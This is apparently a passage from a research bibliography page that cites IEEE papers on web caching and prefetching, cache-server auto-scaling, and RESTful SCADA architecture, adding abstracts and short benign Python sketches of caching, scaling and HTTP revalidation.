Abstract: With the evolution of Web 2.0 and the appearance of AJAX technology, a new breed of applications for the Web has emerged. However, the low degree of reusability achieved and high development costs are the main problems identified in this domain. Another important issue that must be taken into consideration is that the performance of this type of application is drastically affected by latency, since such applications must be downloaded before they can be used. Therefore, it becomes essential to promote a software development approach that attenuates these problems. This is the reason why this paper proposes a model-driven architecture for developing web applications. Towards this end, the following tasks have been carried out: first, a new profile extends UML and introduces web concepts at the design level; then, a new framework supports web application development according to the component-based methodology; and finally, a transformation model is proposed to generate the final code semi-automatically. Another contribution of this work is the definition of a cache and a prefetching protocol to reduce latency and provide high performance web applications.
Keywords: Internet; object-oriented programming; software engineering; storage management; AJAX technology; UML; cache protocol; component-based methodology; high performance Web applications; model-driven Web applications; prefetching protocol; software development approach; Browsers; Cities and towns; Computational modeling; Data models; Proposals; Unified modeling language; Web services; AJAX; component-based software engineering; model-driven architecture; rich internet applications; web applications (ID#: 15-7197)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7237258&isnumber=7237120
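The abstract above mentions a cache plus a prefetching protocol for reducing perceived latency. As a rough illustration of that general idea (not the paper's actual protocol), the sketch below caches fetched components with a freshness window and speculatively warms the cache for components the caller expects a page to need next; the class name, TTL policy, and `prefetch_links` parameter are all illustrative assumptions.

```python
import time

class PrefetchingCache:
    """Toy cache-plus-prefetch sketch: cache fetched components for a
    freshness window and speculatively fetch likely-next components.
    Illustrative only; not the protocol defined in the cited paper."""

    def __init__(self, fetch, ttl=60.0):
        self.fetch = fetch   # function: url -> content
        self.ttl = ttl       # seconds an entry stays fresh
        self.store = {}      # url -> (content, fetched_at)

    def get(self, url, prefetch_links=()):
        now = time.time()
        entry = self.store.get(url)
        if entry is None or now - entry[1] > self.ttl:
            entry = (self.fetch(url), now)
            self.store[url] = entry
        # Speculatively warm the cache for components the page is
        # expected to request next (the "prefetch" step).
        for link in prefetch_links:
            if link not in self.store:
                self.store[link] = (self.fetch(link), now)
        return entry[0]
```

A later `get` for a prefetched URL is then served from the local store instead of triggering a new download, which is the latency win the abstract alludes to.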
Horiuchi, A.; Saisho, K., “Development of Scaling Mechanism for Distributed Web System,” in Software Engineering, Artificial Intelligence, Networking and Parallel/Distributed Computing (SNPD), 2015 16th IEEE/ACIS International Conference on, vol., no., pp. 1–6, 1–3 June 2015. doi:10.1109/SNPD.2015.7176214
Abstract: Progress in virtualization technology in recent years has made it easy to build cache servers in the Cloud, making it possible to increase Web service capacity using virtual cache servers. However, the expected responsiveness cannot be achieved when there are too few cache servers for the load; conversely, costs increase through surplus resources when there are too many. Therefore, we have been developing a distributed Web system suitable for the Cloud that adjusts the number of Web servers according to their load in order to reduce running cost. This research aims to implement the scaling mechanism for the distributed Web system. It has three functions: a load monitoring function, a cache server management function, and a destination setting function. This paper describes these functions and an evaluation of a prototype of the scaling mechanism.
Keywords: cache storage; cloud computing; distributed processing; virtualisation; Web service capacity; cache server management function; destination setting function; distributed Web system; load monitoring function; scaling mechanism; scaling mechanism development; virtual cache servers; virtualization technology; Load management; Mirrors; Monitoring; Time factors; Time measurement; Web servers; Auto Scaling; Cache Server; Cloud; Load Balancing (ID#: 15-7198)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7176214&isnumber=7176160
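The scaling mechanism described above balances two failure modes: too few cache servers (poor responsiveness) and too many (surplus cost). A minimal threshold-based scaling rule in that spirit might look like the sketch below; the thresholds, bounds, and one-server-at-a-time policy are assumptions for illustration, not the authors' algorithm.

```python
def plan_cache_servers(load_per_server, current,
                       low=0.3, high=0.7,
                       min_servers=1, max_servers=10):
    """Toy scaling decision: add a virtual cache server when average
    utilization exceeds `high`, remove one when it falls below `low`.
    Thresholds and step size are illustrative assumptions."""
    avg = sum(load_per_server) / len(load_per_server)
    if avg > high and current < max_servers:
        return current + 1   # under-provisioned: scale out
    if avg < low and current > min_servers:
        return current - 1   # over-provisioned: scale in to cut cost
    return current           # load within band: no change
```

In the paper's terms, the load figures would come from the load monitoring function, the returned count would drive the cache server management function, and the destination setting function would then route requests to the adjusted server set.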
Polonia, P.V.; Bier Melgarejo, L.F.; Hering de Queiroz, M., “A Resource Oriented Architecture for Web-Integrated SCADA Applications,” in Factory Communication Systems (WFCS), 2015 IEEE World Conference on, vol., no., pp. 1–8, 27–29 May 2015. doi:10.1109/WFCS.2015.7160563
Abstract: Supervisory Control and Data Acquisition (SCADA) systems are widely used in industry and public utility services to gather information from field devices and to control and monitor processes. The adoption of Internet technologies in automation has brought new opportunities and challenges for industries, establishing the need to integrate information from various sources on the Web. This paper presents the design and implementation of a Resource Oriented Architecture for typical SCADA applications based on the principles of the Representational State Transfer (REST) architectural style. The application to a didactic Flexible Manufacturing Cell illustrates how SCADA can take advantage of the interoperability afforded by open Web technologies, interact with a wide range of systems, and leverage the existing Web infrastructure, such as proxies and caches.
Keywords: Internet; SCADA systems; cellular manufacturing; control engineering computing; flexible manufacturing systems; open systems; process control; production engineering computing; software architecture; Internet technologies; REST; Web-integrated SCADA applications; caches; didactic flexible manufacturing cell; field devices; industry services; information gathering; information integration; interoperability; open Web technologies; process control; process monitoring; proxies; public utility services; representational state transfer architectural style; resource oriented architecture; supervisory control-and-data acquisition systems; Computer architecture; Protocols; SCADA systems; Scalability; Servers; Service-oriented architecture; Industry 4.0; M2M; REST; ROA; SCADA; WEB (ID#: 15-7199)
URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160563&isnumber=7160536
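A key point in the abstract above is that REST-styled SCADA resources can reuse ordinary Web caches and proxies. One standard way this works is for the resource to emit `Cache-Control` and `ETag` headers so intermediaries can cache a reading and revalidate it cheaply with a conditional request. The sketch below shows that mechanism for a hypothetical temperature resource; the JSON layout and the 5-second `max-age` are illustrative assumptions, not details from the paper.

```python
import hashlib

def sensor_response(reading, request_headers):
    """Build an HTTP-style response for a cacheable SCADA reading.
    Standard ETag revalidation: if the client's If-None-Match matches
    the current representation, answer 304 with no body so the cached
    copy is reused. Resource layout and max-age are assumptions."""
    body = f'{{"temperature": {reading}}}'
    etag = '"' + hashlib.sha1(body.encode()).hexdigest()[:16] + '"'
    headers = {"ETag": etag, "Cache-Control": "max-age=5, public"}
    if request_headers.get("If-None-Match") == etag:
        return 304, headers, ""   # intermediary's cached copy is still valid
    return 200, headers, body
```

Because these are plain HTTP semantics, any off-the-shelf proxy between the field network and the Web clients can absorb repeated polls of the same reading, which is the infrastructure reuse the abstract highlights.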
Note:
Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.